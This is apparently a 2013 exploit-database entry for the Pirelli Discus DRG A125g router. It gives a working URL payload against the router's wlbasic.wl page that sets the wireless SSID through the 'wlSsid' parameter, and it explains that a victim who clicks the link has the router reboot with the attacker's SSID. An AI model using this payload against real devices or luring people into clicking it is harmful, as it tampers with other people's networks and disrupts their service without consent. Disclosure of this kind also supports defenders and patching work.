21 lines
600 B
Text
Executable file
21 lines
600 B
Text
Executable file
# Exploit Title: Pirelli Discus DRG A125g remote change SSID value
|
|
vulnerability
|
|
# Hardware: Pirelli Discus DRG A125g
|
|
# Date: 2013/11/23
|
|
# Exploit Author: Sebastián Magof
|
|
# Tested on: Linux/Windows
|
|
# Twitter: @smagof
|
|
# Greetz: Family, friends && under guys.
|
|
# Special Greetz:
|
|
# (\/)
|
|
# (**) ?lpha
|
|
#(")(")
|
|
|
|
|
|
#Exploit:
|
|
|
|
http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof
|
|
|
|
#info: where the parameter "wlSsid" is where the attacker will enter the
|
|
new SSID. If the victim clicks on the url your modem / router will reboot
|
|
automatically with the new SSID provided by the attacker.
|